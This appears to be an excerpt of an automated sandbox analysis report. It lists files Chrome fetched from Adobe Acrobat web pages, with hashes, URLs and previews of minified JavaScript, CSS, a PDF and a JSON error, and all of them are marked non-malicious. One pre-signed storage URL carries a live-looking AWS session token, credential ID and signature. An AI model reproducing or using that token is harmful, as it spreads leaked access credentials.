                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (5906)
                                                      Category:downloaded
                                                      Size (bytes):5954
                                                      Entropy (8bit):4.655259177387779
                                                      Encrypted:false
                                                      SSDEEP:96:FTRfSsuYZu7QXmGeRoXKHEaj1k6DcgbZlNMoAxJ3cvqMfCTDURRoXKHEaj1k6Dc9:cauYD6oaHEWusH7KxySLsPoaHEWusH7u
                                                      MD5:7F138CE1679B288CBF0DA64964D26EA7
                                                      SHA1:BFFCF2F654E8C728A5AC472522E79964B63C4FDD
                                                      SHA-256:0F10B2C3E61121B99A186D14F9503C153B265C05191B5A57A616BED8FAFF1BAE
                                                      SHA-512:88008BAB2E7952866C58AE5B2AD344C48EE048B07C2FCAEE1DB9AA18C01D5D72EE247B5AE060CD9E9C131EE46FBA47F86434F27A07DC90D94FF78404E48C860E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/18-18-icons.js
                                                      Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[7070],{ZutN:(e,a,l)=>{var t=l("YWiy");function SDCCompressPdf18N(e){return t.createElement("svg",e,t.createElement("g",null,[t.createElement("path",{d:"M3.49916,5.01609V2.24652A.74286.74286,0,0,1,4.21946,1.5h7.2811a.51334.51334,0,0,1,.33575.13915L14.35639,4.1947a.50157.50157,0,0,1,.14445.35546v.45946a4.44135,4.44135,0,0,1,1.47451-.71946,1.972,1.972,0,0,0-.55315-1.15109L12.90212.58347A1.98609,1.98609,0,0,0,11.50251,0H4.20877A2.248,2.248,0,0,0,2,2.24994V4.285A4.44161,4.44161,0,0,1,3.49916,5.01609Z",fill:"var(--iconFill, #464646)",key:0}),t.createElement("path",{d:"M14.50083,12.20058V14.7535a.743.743,0,0,1-.72127.74656H4.23021a.74557.74557,0,0,1-.731-.75V12.19416A4.442,4.442,0,0,1,2,12.92528v1.82136A2.2508,2.2508,0,0,0,4.21946,17H13.7903A2.24882,2.24882,0,0,0,16,14.75006V12.92761A4.44221,4.44221,0,0,1,14.50083,12.20058Z",fill:"var(--iconFill, #464646)",key:1}),t.createElement("path",{d:"M.97247,11.08558.627,1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4463)
                                                      Category:downloaded
                                                      Size (bytes):4464
                                                      Entropy (8bit):5.273793281217392
                                                      Encrypted:false
                                                      SSDEEP:96:SIYRJk8TUFQeFOyy9/kxOG79p5pMvR7g4ZURGFQPRmvXv+qsLjy:SIYn2F1MPfo1MpM4ZSGFQPRmvXv+z+
                                                      MD5:1394ECEBCD2884525807B88B36E7936A
                                                      SHA1:ACD07DB156ECFDD8CF481E8E5A7A42A71DD2EB51
                                                      SHA-256:F186B87156FB1623C0F0B92DC174F6474442FCE5E7B97E684002D9B956684AE4
                                                      SHA-512:7902E8BB8CC47E24180753EE0ED510778116693C43DA38A35870BDCCC1E20B99E68D97332E12122F04640FB29789942F7461ED726DC01671F56697E2CF18FADC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/marketingtech/main.standard.min.js
                                                      Preview:!function(){"use strict";var e=window,t=document,n=Object.defineProperty,a="replace",o=function(e){return e=e[a](/%2523access_token%253D.*?%2526/gim,"%2526")[a](/%23access_token%3D.*?%26/gim,"%26")[a](/#access_token=.*?&/gim,"&")[a](/information=[^\&]+/,"")[a](/puser=[^\&]+/,"")[a](/fnuser=[^\&]+/,"")[a](/lnuser=[^\&]+/,"")};function i(){try{var e="referrer",a=t[e],i=o(a);i!==a&&n(t,e,{configurable:!0,value:i})}catch(e){}}var r=t.head,l=e.marketingtech,c=decodeURIComponent;function d(e){var n,a,o,i;for(a=0,o=(n=t.cookie?t.cookie.split("; "):[]).length;a<o;a++)if(i=n[a],c(i.substr(0,i.indexOf("=")))===e)return c(i.substr(i.indexOf("=")+1))}function s(){var n,a,o,i="alloy-prehiding",c="@keyframes alloyShow{from {opacity: 0.01;} to {opacity: 1;}}body,.personalization-container{opacity:0.01 !important;animation: 0s 3s forwards alloyShow}",s=3e3;if(t.getElementById("feds-script")&&(i="manual-prehiding"),a=t.getElementById(i),o=function(e){try{e&&e.parentNode&&e.parentNode.removeChild(e)}cat
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (17276)
                                                      Category:downloaded
                                                      Size (bytes):17323
                                                      Entropy (8bit):5.2624702149207065
                                                      Encrypted:false
                                                      SSDEEP:384:aN1EOe8mI0piDwWWNogbRqXkQtSDzaRQpGmHOv:aN2Oe8mIQUwTnRcNtSHaRQpGmHm
                                                      MD5:26EF6235F709EC03430D1E657033D1DA
                                                      SHA1:976C607DDEF4202EC0955987AA5D7B7698D0019E
                                                      SHA-256:CCE5F6806A5D62BEE3AAE5823ED6B72080817D84D5D07661834BE73155ECDD57
                                                      SHA-512:D36E6DB4D771377555B668DF8DFCC4B11660CE2166F713A3D748C83F5CA072E537B6AB9BAB30F3E181F0E4800E3959044A6F5EE07BE62A53316365BC1A5B50F9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1347.0/6478-chunk.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},a=(new e.Error).stack;a&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[a]="b1b57789-be52-4dd6-aef9-8e5f8b16ae94",e._sentryDebugIdIdentifier="sentry-dbid-b1b57789-be52-4dd6-aef9-8e5f8b16ae94")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"83b9488d5bb7830d24a07d05c562ad0e9ff36b58"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[6478],{"/Ld9":(e,a,t)=>{"use strict";t.d(a,{D3:()=>isChromeViewerOrEmbedViewer,Dl:()=>getExtensionOpenLink,F7:()=>getIsExtensionInstalled,XD:()=>getExtensionDownloadLink,ar:()=>shouldScrollIntoViewport,dC:()=>isDeviceMobileOrTablet,fS:()=>getDownloadExtensionQueryParams,i7:()=>isChrome,qs:()=>getBrowser,un:()=>isEdge});var r=t("plsW");const isChrome=async()=>{const e=await r.providers.device();if(e.userA
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4788874
                                                      Entropy (8bit):5.955460959627024
                                                      Encrypted:false
                                                      SSDEEP:24576:qP3cB9zd3ypYsUaqbVOOOrCzGY+8JjFmV6DpT+XkpDij50w/UBazaJyZzaXqn/YJ:VU8inbKsHq2U
                                                      MD5:90EA10DA8457514776057B76101D1B04
                                                      SHA1:22B4050C612F4EECC803238180750F5A92E10A70
                                                      SHA-256:41F262C93FA457BC2EADC075FC4510038B5E9970A36AD938487C6DFB4392CB95
                                                      SHA-512:5CFB3F8D96816F306AB05A5125F402FE88542AA86B48F22408BDCA33AF1C49881AD79BC84E70CEC872D34FE69293C56B652BEA1FEA4FDF50030B9AF0105C6ACE
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..@.@..A. .E...A. .E....@ .g .gj".A.K.. .A.G.. .A.F.. .A.F.. .. ..~B ..... . .l.!. ...A....#.!..@.@A....!..4 . .A...j...!.... .$..@ .....4.....A. .E....@ .g .gj".A.K.. .A.F.@ .A.F.. .A.F.. .. ..~B .P...#.!..@.@A....!..4 . .A...j...!..-. .$..@ .....4..... . .l".AyO.( .A.j.!. . .A.q6... . . .Axqk6... . .A.v".6... . .A.v .k".6... .A..j ....!. .A.:... .A.:... .A.:... . .A..j6....@ .A.j .A..jA.....). .$. .#.A..=j6... .(..."..@#.!. . .6...#.(..".!..@#. .G.@ .A.j .A..j .A.k-...". .(.. .A.k".(..kA.k6.. .....#.(..".(.. .(..". .(..k".A. . .O.I.@ .A.6.... .$....... .-....@ .A.:.... .-....@ .A.:......... ..@ .A..;... . .6... . .6... .A.:... .A.:... .A.:... . .6... .A.:... .A.:... .#.A..=j6....@ ..@ .!..@ ..... .(...!. .A.k".... .A.:... .-...... .A.:.... . .A..j6... . .A..j".6... . . ...7...A.!....@.@..A. .E...A. .E....@ .g .gj".A.K.. .A.G.. .A.F.. .A.F.. .. ..~B ..... . .l.!. ...A....#.!..@.@A....!..4 . .A...j...!..). .$..@ .....4.....A. .E....@ .g .gj".A.K.. .A.F.@ .A.F.. .A.F.. .. ..~B .P...#.!.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:troff or preprocessor input, ASCII text, with very long lines (7656)
                                                      Category:downloaded
                                                      Size (bytes):66464
                                                      Entropy (8bit):5.050281079221053
                                                      Encrypted:false
                                                      SSDEEP:384:FKf1oRoy/SFWwD2/sC7BPoobaj6WacO1crMUc3K+6lAEw0o1umTgPYKxms+a5mNG:FKfny/uW82/HMo6j7sL06croMca
                                                      MD5:CA344841298EEDD995DB0268E6DAE183
                                                      SHA1:31057C6C81ADEFA4796A7931AAA48553C5C09ABA
                                                      SHA-256:11F0D5166D3992C0FB0FDEF41A0A943C8BCF1FF631306C9A2330FF476D62ADF5
                                                      SHA-512:5C291DBD61E85ABD6FB88B7BC853A51B80B909D0E7316BCCFCF08701EEB8AD8D7C61947734755F54A3B2C77F5F1F87CFA8FD5FA511635ADF802BFB837F2508BE
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-core/3.70.1/dc-extras.css
                                                      Preview:.spectrum-Alert{position:relative;display:inline-block;box-sizing:border-box;min-width:368px;min-height:38px;margin:8px 0;padding:20px;border-width:2px;border-style:solid;border-radius:4px}.spectrum-Alert-icon{position:absolute;display:block;top:20px;right:20px}.spectrum-Alert-header{display:inline-block;height:auto;min-height:0;margin:0;padding:0 30px 0 0;font-size:14px;font-weight:700;font-style:normal;line-height:14px;text-transform:none}.spectrum-Alert-content{display:block;margin:8px 0 0;padding:0;font-size:14px;word-wrap:break-word}.spectrum-Alert-footer{display:block;text-align:right;padding-top:.5rem}.spectrum-Alert-footer:empty{display:none}.spectrum-Alert-footer .spectrum-Button{margin-right:0;margin-left:.75rem}..spectrum--light .spectrum-Alert{background-color:#fff;color:#6e6e6e}.spectrum--light .spectrum-Alert-header{color:#2c2c2c}.spectrum--light .spectrum-Alert-content{color:#6e6e6e}.spectrum--light .spectrum-Alert--info{border-color:#2680eb}.spectrum--light .spectrum-Al
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PDF document, version 1.3, 1 pages
                                                      Category:downloaded
                                                      Size (bytes):45812
                                                      Entropy (8bit):7.93874828988277
                                                      Encrypted:false
                                                      SSDEEP:768:L2l2prumwybVnuZzgr/5KLMRc18h6ISbS4qaMDcC9k6SggBEJdw+2iba+A:LSouENuZqhKLM0zqaMQC9kn1mdgJ+A
                                                      MD5:6C45336BB46FB3B29B98239E05A42882
                                                      SHA1:910B92A2B7DDA4BB54D3AD582D22172D6BF6CC17
                                                      SHA-256:C86F9DF037FFBD61598DE153967898987DA9FC2B7872094FD5E7F9998F37C1A5
                                                      SHA-512:FD99DC451B335D5EA83865CCC5DCC90C3FCE77F99609E1CF304531D22A5ADCB18BADB8C528045A48E8EB49A56BDF2472DB9085A8CC0F43F4027FD7C9DDE7EC87
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acp-aep-cs-blobstore-prod-irl1-data.adobe.io/e0b958b0-4b06-4e81-b7e5-e275d804b44d?x-user-client-id=CC-CollabService&x-region=irl1&x-version-id=2&x-partition-prefix=8ed4f4f7948502ae5ae162178312cc19a6048901079bcfc36e42a95136d3b22e&x-resource-id=fc8080f19df421d841b54344a37ebd49f726900053e794af1960ae0d648f9e0b297b432e&x-key-id=BN5JZ&response-content-disposition=attachment%3B%20filename%3D%22AN.pdf%22&response-content-type=application%2Fpdf&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEAUaCWV1LXdlc3QtMSJHMEUCIHI69DJ9qRp9LbQjK2fZTngjHOIHmdfFj5yWvYpOjmGCAiEA%2BtJ2X%2Bukf%2FMrVlqLdtTPaiMbc7U6qzN%2B8C4tqU9s7eYq6wEIXhACGgw3NjY5Njk4NDQwNzgiDOqZ6gyvetbWyF8gtSrIATUKhljkE%2BxtMfvl3IRdSBI0orSgjd1KIUKBAEUM%2FWxsyqjqUhA45u6j8ri%2FZA4ZFI6nwCVRSKagHs54X5fXgj4AcU3gQ5zC83k6GjWDis5gFRwO4Gnw63VRPlNT58ywP5Tkr6EuinSQzjAuAzkSyt8fpp7BqKoiN7sCBCEJ%2FlFZS00ult%2Fm7JOBKuHowMw9AjbEWYbebl8BXz0jFQfly1EkcF51fZBu634TH21mNCv7Vq%2B0WFvGOehVmmvFb0aLP33zppz8Z5CpMLfc5b4GOpgBUi2GyyLM4GB2KrkF%2F1QzdyDog6aaB3ZuEWufgWzrksW7TMcafU81oEPMdKmdq1NMidUCGfaFnHQoemA99sGDraHIUVO3Qo2L6fsBVBQnMR%2B6NpwfK6fHNCcgLNscw6mnjLS8IpFMbeoOOp4kBwqW2czg12Bxjhj3SarmJl97iODUsP8h4lxhmX114ygBQs28X%2FbUj4howho%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250318T132644Z&X-Amz-SignedHeaders=host&X-Amz-Expires=14400&X-Amz-Credential=ASIA3FEXXCFXFEUVPL2P%2F20250318%2Feu-west-1%2Fs3%2Faws4_request&X-Amz-Signature=1eade0d9351145fd5ba2911acd1876d0b5319148d32c30caca9c5d09021b19a7
                                                      Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 2123 >>.stream.x..Y...}.WP.x..n.$E.T...n.{....!.. . ..l..@N....ROw..b`..oU.N]..I..~R...u*.N.._......z......H....=7.c5&<~T..5.=:c..}u..^..NYu.Q.C5..v..j.v*.>=.N...z.Z.;...g4.C~.S.U...L}.K#.j.w.v4d_..;.7..Ou.J}y.fk...6.^;c.Z..D;....aZ.b:.^w..i_u.l[.b$4..p}.S^.U.h..f@u..F.&#...q[.-.8G...D..*s.,.Z.R0...S...xj.....n.....3....U.r... }....{.p..w.J..c....e<.-. ..l.7.<.YM.6-$..+....%fW$.j.I..q.+,.M;.... .h.Hs.Re..2..3.i.%{.D.[.`.1.S..Y...hu...9VA..f.....EB.....`..OR..f..!."..a......../P.*.J8.n..6tN.8.:..'a..+d!.T.4`...nc..]....in...=..]..g..W..HE...@/.Z.|.q.k....We.U.v&.9.W,i.....t..)...vC...K..:..V.s~......%N..:Sy...-.;K.. m.....v...<......R..N....w.......:.>..~.z.;.....`.q........v..E.B.C:.kQ.D....33. I..l...E.."#Z5_2..J.$.....3-.a.c...].>.Tqj.....{.....Y.#..6...@G..... ./l.._%..N..H..eR..b.z.`f...._.h.UB......pC........S..5I...].]..l...#.r..~m..tx.......e.h...........}.T.j.4..#I.pA.s.a
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (19090)
                                                      Category:downloaded
                                                      Size (bytes):19148
                                                      Entropy (8bit):5.4344631748007055
                                                      Encrypted:false
                                                      SSDEEP:384:sJJz8/89H9Mwqdj0cgh/Cg/RJXaLQABSk8vsRY7cYWxPahEZVv0sUzJW:Gz8/89HpqdAcuL/RJXaLQABSkVScYWdN
                                                      MD5:AAC4FC102C4256C678BCC8C19FB51CDF
                                                      SHA1:176717C83AB7A73BD18FC00707619128118CB97A
                                                      SHA-256:107FE7C3430BF667BCB78C4C19A281B8B6AE4693C73F32253FCC7A645179F77B
                                                      SHA-512:2A06FE1C9062E7A5E13BFA5655B0DFC1FF6E900D2E98B6DDA97AE068D557567C49CF5BC8B964861905346FC68C640BDBD14EAAAF892EB1C971A5AB58E5BB12D1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fillsignoverlay-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[8973],{"s0/1":(e,t,i)=>{var a=NaN,r="[object Symbol]",n=/^\s+|\s+$/g,o=/^[-+]0x[0-9a-f]+$/i,s=/^0b[01]+$/i,c=/^0o[0-7]+$/i,l=parseInt,d="object"==typeof i.g&&i.g&&i.g.Object===Object&&i.g,u="object"==typeof self&&self&&self.Object===Object&&self,g=d||u||Function("return this")(),p=Object.prototype.toString,f=Math.max,v=Math.min,now=function(){return g.Date.now()};function isObject(e){var t=typeof e;return!!e&&("object"==t||"function"==t)}function toNumber(e){if("number"==typeof e)return e;if(function isSymbol(e){return"symbol"==typeof e||function isObjectLike(e){return!!e&&"object"==typeof e}(e)&&p.call(e)==r}(e))return a;if(isObject(e)){var t="function"==typeof e.valueOf?e.valueOf():e;e=isObject(t)?t+"":t}if("string"!=typeof e)return 0===e?e:+e;e=e.replace(n,"");var i=s.test(e);return i||c.test(e)?l(e.slice(2),i?2:8):o.test(e)?a:+e}e.exports=function debounce(e,t,i){var a,r,n,o,s,c,l=0,d=!1,u=!1,g=!0;if("functi
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):113
                                                      Entropy (8bit):4.3550585561113895
                                                      Encrypted:false
                                                      SSDEEP:3:agXH+b+EzIPBKOAKyZHLWRlqfMpKBAHfjFYiFCn:aSeCEa5+HyRlkSaifGiMn
                                                      MD5:515AF12EE587C73EAC2751CF4C6609AC
                                                      SHA1:21F0FA4622E744B49E0BC67637FCB58B1EA6FF47
                                                      SHA-256:D13C4EA97A79FC2823308F15741410FC65E389FCFB06EAAE4E89A2D909771697
                                                      SHA-512:57BEB08767E413C497CCD632DE2C5BDC9653910224FDFAAEFED6908580B671243926691797CCAECE96558D75B171E74715CA0E5AC86458FF55E5784ADA7C8643
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{ "error": { "code": "Forbidden", "message": "Oauth token is missing", "details": { "error_code": "403010" } } }.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (34395)
                                                      Category:downloaded
                                                      Size (bytes):34443
                                                      Entropy (8bit):4.804262082828672
                                                      Encrypted:false
                                                      SSDEEP:384:Qo043sLX1zLXDL0KL7pHkBcotyMnLnXWwzIowCDv+dOECgmB9XBuDLl/BoBVlHQi:QjsLttXF9wxmTXK7oBXH+W
                                                      MD5:3E0663E04DA6D2A0C3E2C31888CC6406
                                                      SHA1:35E497A38361D90F250330B5F46F3C4FFB352F01
                                                      SHA-256:35394AA6A0C3AFC2FEF40A5E9B045FD057FCD337D0B68AF0FEB767F3D71521C3
                                                      SHA-512:066B329E53C79547EE77A45419A6177ACB881C06FD34C1D7C4854A8EF646B6BEE91B65A5BF77E7467594C77EDE0D4CD502FF6487FB25B15BFFD09CA7240B392E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.682.0/24-24-icons.js
                                                      Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[983],{QEeY:(e,t,l)=>{var L=l("YWiy");function A12CCXCustomPage(e){return L.createElement("svg",e,[L.createElement("path",{d:"M21.34375,9H11.65625c-1.46688,0-2.65625,1.21987-2.65625,2.72436v9.55128c0,1.50449,1.18937,2.72436,2.65625,2.72436h9.6875c1.46688,0,2.65625-1.21987,2.65625-2.72436V11.72436c0-1.50449-1.18937-2.72436-2.65625-2.72436Zm-3.10338,10.61522l-1.53259-3.57642c-.08233-.19412-.34899-.19293-.43072,.00119l-.75108,1.78642c-.06622,.15721,.04892,.33049,.21954,.33049,0,0,.37882-.00298,.40268-.00298,.57987,0,1.04996,.46983,1.04996,1.04803s-.46831,1.04684-1.04698,1.04803h-2.35645c-.7469,0-1.2516-.75982-.96167-1.447l2.11603-5.02997c.2613-.61989,.87338-1.02302,1.54631-1.02302s1.27905,.40195,1.54094,1.02005l2.12975,5.03057c.29172,.68777-.21298,1.44879-.96167,1.44879-.35317-.00119-.75347-.15661-.96406-.63418Z",fill:"var(--iconIndigo, #5258e4)",key:0}),L.createElement("path",{d:"M7,20c0,.71131,.14853,1.3
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (36248)
                                                      Category:downloaded
                                                      Size (bytes):36306
                                                      Entropy (8bit):5.322809678994898
                                                      Encrypted:false
                                                      SSDEEP:768:nYi0ntzASUCz4OiJBnnt0arAv6+kmnY5h8RAN+ZaKKPy6lSFrr:nYTntzAhplJ9ntzPvnlSFrr
                                                      MD5:C95E800A05FAAC73C3E88D4CED67C8FF
                                                      SHA1:41B992BDE89D2FA03DB61174F4C27E3A73C59710
                                                      SHA-256:6B14DF8DB880744177AA09604BE758CFC2079BE89DF3CF0D17D77EB735B2BE53
                                                      SHA-512:3D4E9C007B4E2D03C26BADF939531160B4DB66337724B20CE7B570AB7FA8F4EE4A9C6DAC2F4E32A14E0FBD38B087ECF77FD6A69D066D41043487C39F61021EDF
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fillsignservice-chunk.js
                                                      Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[280],{DZTv:(e,t,r)=>{e=r.nmd(e);var n="__lodash_hash_undefined__",a=1,i=2,o=9007199254740991,s="[object Arguments]",c="[object Array]",u="[object AsyncFunction]",l="[object Boolean]",f="[object Date]",h="[object Error]",p="[object Function]",d="[object GeneratorFunction]",y="[object Map]",b="[object Number]",g="[object Null]",v="[object Object]",_="[object Promise]",m="[object Proxy]",j="[object RegExp]",A="[object Set]",w="[object String]",O="[object Symbol]",C="[object Undefined]",S="[object WeakMap]",T="[object ArrayBuffer]",k="[object DataView]",P=/^\[object .+?Constructor\]$/,E=/^(?:0|[1-9]\d*)$/,I={};I["[object Float32Array]"]=I["[object Float64Array]"]=I["[object Int8Array]"]=I["[object Int16Array]"]=I["[object Int32Array]"]=I["[object Uint8Array]"]=I["[object Uint8ClampedArray]"]=I["[object Uint16Array]"]=I["[object Uint32Array]"]=!0,I[s]=I[c]=I[T]=I[l]=I[k]=I[f]=I[h]=I[p]=I[y]=I[b]=I[v]=I[j]=I[A]=I[w]=I
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1531)
                                                      Category:downloaded
                                                      Size (bytes):1578
                                                      Entropy (8bit):5.256177839517021
                                                      Encrypted:false
                                                      SSDEEP:48:KpfIdK56XyMmgMVLu2XU9MwrQjvrszYUB2s//:I6XyMQS2X6U8B2sX
                                                      MD5:61D0563F20C67B0FAB43E1736FB9FFD8
                                                      SHA1:B7200B8FB0F08BB91DB8C80FE62C031E76B923D1
                                                      SHA-256:7203FB7E75C9095C90E1246857B60A6AA21B67F76B5EBA2F3F8F45868A04A1EB
                                                      SHA-512:F34C84A54512C9973E6137B896E4083C7E0F94EA01F236B7C7D733EB49B2516D54BBE8E6C50282D28C771001BB347533A8402D1D2A88E55983BEF721D9F71760
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/device-api.js
                                                      Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[160],{"+s7r":(e,t,i)=>{i.r(t),i.d(t,{default:()=>DeviceAPI});class DeviceAPI{constructor(){this.getBrowserName=()=>this.userAgent.getBrowser().name,this.getBrowser=()=>this.userAgent.getBrowser(),this.getOS=()=>this.userAgent.getOS(),this.getEngineName=()=>this.userAgent.getEngine().name,this.isMobile=()=>{const e=this.userAgent.getDevice().type;return e&&null!==e.match(/(phone|mobile|tablet)/i)},this.isTablet=()=>{const e=this.userAgent.getDevice().type;return e&&null!==e.match(/tablet/i)},this.isPhoneSize=function(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:550;return window.matchMedia(`(max-width: ${e}px)`).matches},this.isTabletSize=function(){const e=`(min-width: ${arguments.length>1&&void 0!==arguments[1]?arguments[1]:550}px)`,t=`(max-width: ${arguments.length>0&&void 0!==arguments[0]?arguments[0]:767}px)`;return window.matchMedia(`${e} and ${t}`).matches},this.isTouchDevice=()=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (6799)
                                                      Category:downloaded
                                                      Size (bytes):6856
                                                      Entropy (8bit):5.582321695608858
                                                      Encrypted:false
                                                      SSDEEP:192:BeXYZhfwdbmeStH748hKD7sE8KeltlJbAtQ8Cg+px5mkyg:BeXYzfObtSpoG1AtQ35mpg
                                                      MD5:DECB708C93D4A1A5AEB81B7D8CBA5F35
                                                      SHA1:F53A89281BDA147C5D2EA5CE82AA6F151B9F48E2
                                                      SHA-256:FE135294D430948BBB816B4FDE31619AE769231027CD95D8062A96725CC7E069
                                                      SHA-512:029C01BE2742DF3032F8817F23B20A8D030F31CAB9F7A1BBD8CC513D2D8960283B20DA65293511E6D59F6672F08F0682B0A39DFA0DF8F992B020DA5027C465FD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1382.0/mobileAppPopup-chunk.js
                                                      Preview:(self["webpackJsonp-viewer"]=self["webpackJsonp-viewer"]||[]).push([[1107],{czs0:(e,t,p)=>{"use strict";p.d(t,{Z:()=>_});var a=p("YWiy"),r=p("/hLX"),s=p.n(r),o=p("Ntb/");const CustomIcon=e=>{const t=e.url;return a.createElement(o.Icon,{size:e.size,UNSAFE_classname:e.className},a.createElement(t,{UNSAFE_classname:e.svgClassName}))},n=CustomIcon;CustomIcon.propTypes={url:s().element.isRequired,className:s().string,size:s().string,svgClassName:s().string},CustomIcon.defaultProps={className:null,svgClassName:null,size:"S"};var i=p("6jw6");const CustomIconV2_CustomIcon=e=>{const t=e.url;return a.createElement(i.default,{size:e.size,className:e.className},a.createElement(t,{size:e.size,className:e.svgClassName}))},c=CustomIconV2_CustomIcon;CustomIconV2_CustomIcon.propTypes={url:s().element.isRequired,className:s().string,size:s().string,svgClassName:s().string},CustomIconV2_CustomIcon.defaultProps={className:null,size:"S",svgClassName:null};var l=p("/y6s");const CustomIcon_CustomIcon=e=>e.co
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4813)
                                                      Category:downloaded
                                                      Size (bytes):4905
                                                      Entropy (8bit):4.361564560800376
                                                      Encrypted:false
                                                      SSDEEP:96:54xsuLJcgucsw/jv5gbghyiEBEnnQqo5xbsgIKkhD67:MV9cRcsuvcon19K5
                                                      MD5:62A7332B2CE5AFA98C58B5AFE6297DA0
                                                      SHA1:185040D74D466D0E3B48885BA792743DC34CED30
                                                      SHA-256:3B79A46DBB1A9FCA7EF86ED1C493441375B960E83B104D8D878468193215BB73
                                                      SHA-512:59A78D439404AF6658913C017BA058ED0215F235D198D86798913E1C1A195CA3DA72F1E728F427423B738DC91251930C0588BE0EDC4A311B322813720B08BCFE
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/svg-icons.38d295428c1adcfddb22.bundle.js
